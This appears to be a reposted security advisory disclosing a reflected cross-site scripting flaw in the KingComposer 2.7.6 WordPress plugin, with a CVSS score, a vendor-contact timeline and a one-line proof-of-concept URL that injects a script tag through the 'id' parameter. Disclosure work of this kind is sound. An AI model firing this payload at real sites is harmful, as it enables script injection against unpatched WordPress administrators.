Below is a copy: WordPress KingComposer 2.7.6 Cross Site Scripting
* Vulnerability: XSS
* Affected Software:
[KingComposer](https://wordpress.org/plugins/kingcomposer/)
* Affected Version: 2.7.6
* Patched Version: none
* CVE: not requested
* Risk: Medium
* Vendor Contacted: 10/25/2018
* Vendor Fix: none
* Public Disclosure: 02/05/2019
* Credit: Tim Coen
##### CVSS
6.1 Medium
[CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N](https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)
##### Overview
The KingComposer WordPress plugin is vulnerable to reflected XSS as it
echoes the id parameter without proper encoding.
##### Proof of Concept
http://192.168.0.103/wordpress/wp-admin/admin.php?page=kc-mapper&id=<%2Fscript><script>alert(1)<%2Fscript>
##### Timeline
- 10/25/2018 Asked for email address via contact form
- 10/26/2018 Vendor responds
- 10/26/2018 sent advisory
- 11/01/2018 Vendor responds that they have strict testing in place,
asks if it is certain that the issue exists
- 11/01/2018 Confirmed that the issue indeed exists
- 11/01/2018 unclear response from vendor
- 11/01/2018 asked for clarification & offered to explain issue further
(no response)
- 02/05/2019 Disclosure
##### Details & Full Advisory URL
https://security-consulting.icu/blog/2019/02/wordpress-kingcomposer-xss/
--
PGP Key: https://pgp.mit.edu/pks/lookup?op=get&search=0x204DCBDD29BA0D89
This information is provided for TESTING and LEGAL RESEARCH purposes only. All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum